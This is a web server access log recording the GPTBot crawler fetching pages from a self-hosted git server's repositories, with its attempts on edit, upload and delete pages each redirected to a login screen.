[Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:17:43:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=rendered" [Client 74.7.227.38] [Length 11087] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:17:43:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14175] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:17:43:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/package.json?display=source" [Client 74.7.227.38] [Length 11965] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/package.json" -[17/Feb/2026:17:43:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/metadata.json?display=source" [Client 74.7.227.38] [Length 11322] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/metadata.json" -[17/Feb/2026:17:43:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/status.json?display=rendered" [Client 74.7.227.38] [Length 10918] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/status.json" -[17/Feb/2026:17:43:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresWatchdog/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresWatchdog/.vscode/c_cpp_properties.json" -[17/Feb/2026:17:43:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresWatchdog/.vscode/c_cpp_properties.json" -[17/Feb/2026:17:43:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresWatchdog/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode/c_cpp_properties.json" -[17/Feb/2026:17:43:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresWatchdog/.vscode/c_cpp_properties.json" -[17/Feb/2026:17:43:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresWatchdog/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode/c_cpp_properties.json" -[17/Feb/2026:17:43:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresWatchdog/.vscode/c_cpp_properties.json" -[17/Feb/2026:17:43:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/package.json?display=rendered" [Client 74.7.227.38] [Length 11118] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/package.json" -[17/Feb/2026:17:43:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:43:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/metadata.json?display=source" [Client 74.7.227.38] [Length 11544] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/metadata.json" -[17/Feb/2026:17:43:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/status.json?display=rendered" [Client 74.7.227.38] [Length 11151] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/status.json" -[17/Feb/2026:17:43:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/services/geminiService.ts?display=rendered" [Client 74.7.227.38] [Length 11161] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/services/geminiService.ts" -[17/Feb/2026:17:43:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:43:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__" [Client 74.7.227.38] [Length 10483] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot" -[17/Feb/2026:17:43:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/status.json?display=rendered" [Client 74.7.227.38] [Length 10913] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/status.json" -[17/Feb/2026:17:43:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/metadata.json?display=source" [Client 74.7.227.38] [Length 11318] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/metadata.json" -[17/Feb/2026:17:43:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/status.json?display=source" [Client 74.7.227.38] [Length 11092] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/status.json" -[17/Feb/2026:17:43:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/tsconfig.json?display=source" [Client 74.7.227.38] [Length 11901] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/tsconfig.json" -[17/Feb/2026:17:43:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/status.json?display=source" [Client 74.7.227.38] [Length 11091] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/status.json" -[17/Feb/2026:17:43:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 9837] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3.12" -[17/Feb/2026:17:43:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 10684] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3.12" -[17/Feb/2026:17:43:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" [Client 74.7.227.38] [Length 11153] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0" -[17/Feb/2026:17:43:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10167] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&state=all&type=all" -[17/Feb/2026:17:43:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg?display=rendered" [Client 74.7.227.38] [Length 10941] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -[17/Feb/2026:17:43:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/__pycache__" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__" -[17/Feb/2026:17:43:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/__pycache__" -[17/Feb/2026:17:43:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/GoldPilot/__pycache__" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__" -[17/Feb/2026:17:43:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/GoldPilot/__pycache__" -[17/Feb/2026:17:43:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/__pycache__" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__" -[17/Feb/2026:17:43:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/__pycache__" -[17/Feb/2026:17:43:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/storage.cpython-312.pyc" [Client 74.7.227.38] [Length 11098] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__" -[17/Feb/2026:17:43:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/ui_main.cpython-312.pyc" [Client 74.7.227.38] [Length 11093] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__" -[17/Feb/2026:17:43:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/notifier.cpython-312.pyc" [Client 74.7.227.38] [Length 11101] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__" -[17/Feb/2026:17:43:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/calculator.cpython-312.pyc" [Client 74.7.227.38] [Length 11100] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__" -[17/Feb/2026:17:43:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/pip3.12" -[17/Feb/2026:17:43:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/pip3.12" -[17/Feb/2026:17:43:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/pip3.12" -[17/Feb/2026:17:43:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/pip3.12" -[17/Feb/2026:17:43:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/__pycache__" [Client 74.7.227.38] [Length 9785] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__" -[17/Feb/2026:17:43:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" [Client 74.7.227.38] [Length 9840] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" -[17/Feb/2026:17:43:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" [Client 74.7.227.38] [Length 957] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" -[17/Feb/2026:17:43:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" [Client 74.7.227.38] [Length 14174] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.assets.cache" -[17/Feb/2026:17:43:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg?display=rendered" [Client 74.7.227.38] [Length 10959] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -[17/Feb/2026:17:43:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/__pycache__/storage.cpython-312.pyc" [Client 74.7.227.38] [Length 9812] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/storage.cpython-312.pyc" -[17/Feb/2026:17:43:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/__pycache__/ui_main.cpython-312.pyc" [Client 74.7.227.38] [Length 9810] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/ui_main.cpython-312.pyc" -[17/Feb/2026:17:43:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/__pycache__/notifier.cpython-312.pyc" [Client 74.7.227.38] [Length 9813] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/notifier.cpython-312.pyc" -[17/Feb/2026:17:43:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/__pycache__/calculator.cpython-312.pyc" [Client 74.7.227.38] [Length 9815] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/calculator.cpython-312.pyc" -[17/Feb/2026:17:43:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/__pycache__/calculator.cpython-312.pyc" [Client 74.7.227.38] [Length 906] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/calculator.cpython-312.pyc" -[17/Feb/2026:17:43:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/__pycache__/storage.cpython-312.pyc" [Client 74.7.227.38] [Length 1074] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/storage.cpython-312.pyc" -[17/Feb/2026:17:43:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/__pycache__/notifier.cpython-312.pyc" [Client 74.7.227.38] [Length 902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/notifier.cpython-312.pyc" -[17/Feb/2026:17:43:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/__pycache__/storage.cpython-312.pyc" [Client 74.7.227.38] [Length 900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/storage.cpython-312.pyc" -[17/Feb/2026:17:43:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/__pycache__/ui_main.cpython-312.pyc" [Client 74.7.227.38] [Length 900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/ui_main.cpython-312.pyc" -[17/Feb/2026:17:43:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/__pycache__/calculator.cpython-312.pyc" [Client 74.7.227.38] [Length 2130] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/calculator.cpython-312.pyc" -[17/Feb/2026:17:43:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/__pycache__/ui_main.cpython-312.pyc" [Client 74.7.227.38] [Length 28581] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/__pycache__/ui_main.cpython-312.pyc" -[17/Feb/2026:17:43:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/__pycache__/notifier.cpython-312.pyc" [Client 74.7.227.38] [Length 6611] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 